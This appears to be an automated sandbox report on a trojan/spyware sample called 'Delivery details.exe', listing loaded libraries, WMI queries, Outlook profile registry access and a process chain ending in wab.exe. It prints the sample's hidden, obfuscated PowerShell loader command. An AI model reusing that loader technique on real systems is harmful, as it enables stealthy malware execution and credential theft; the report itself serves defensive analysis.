              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windowscodecs.dllJump to behavior
              Source: Delivery details.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/15@3/3
              Source: C:\Users\user\Desktop\Delivery details.exeCode function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403489
              Source: C:\Users\user\Desktop\Delivery details.exeCode function: 0_2_00404814 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404814
              Source: C:\Users\user\Desktop\Delivery details.exeCode function: 0_2_004020FE CoCreateInstance,0_2_004020FE
              Source: C:\Users\user\Desktop\Delivery details.exeFile created: C:\Users\user\AppData\Roaming\akroterionJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_03
              Source: C:\Users\user\Desktop\Delivery details.exeFile created: C:\Users\user\AppData\Local\Temp\nsd7EFB.tmpJump to behavior
              Source: Delivery details.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Delivery details.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\Delivery details.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\Delivery details.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\Delivery details.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\Delivery details.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\Delivery details.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\Delivery details.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\Delivery details.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\Delivery details.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Delivery details.exeVirustotal: Detection: 13%
              Source: Delivery details.exeReversingLabs: Detection: 13%
              Source: C:\Users\user\Desktop\Delivery details.exeFile read: C:\Users\user\Desktop\Delivery details.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Delivery details.exe C:\Users\user\Desktop\Delivery details.exe
              Source: C:\Users\user\Desktop\Delivery details.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" -windowstyle hidden "$Trvlede=Get-Content 'C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri';$Argentinas=$Trvlede.SubString(59499,3);.$Argentinas($Trvlede)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
              Source: C:\Users\user\Desktop\Delivery details.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" -windowstyle hidden "$Trvlede=Get-Content 'C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri';$Argentinas=$Trvlede.SubString(59499,3);.$Argentinas($Trvlede)Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
              Source: Delivery details.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000006.00000002.3266183941.0000000004BC8000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0Jump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" -windowstyle hidden "$Trvlede=Get-Content 'C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri';$Argentinas=$Trvlede.SubString(59499,3);.$Argentinas($Trvlede)
              Source: C:\Users\user\Desktop\Delivery details.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" -windowstyle hidden "$Trvlede=Get-Content 'C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri';$Argentinas=$Trvlede.SubString(59499,3);.$Argentinas($Trvlede)Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_02A8F9C7 pushad ; iretd 6_2_02A8F9C9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_02A80C3D push edi; ret 6_2_02A80CC2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\Delivery details.exeJump to dropped file
              Source: C:\Users\user\Desktop\Delivery details.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
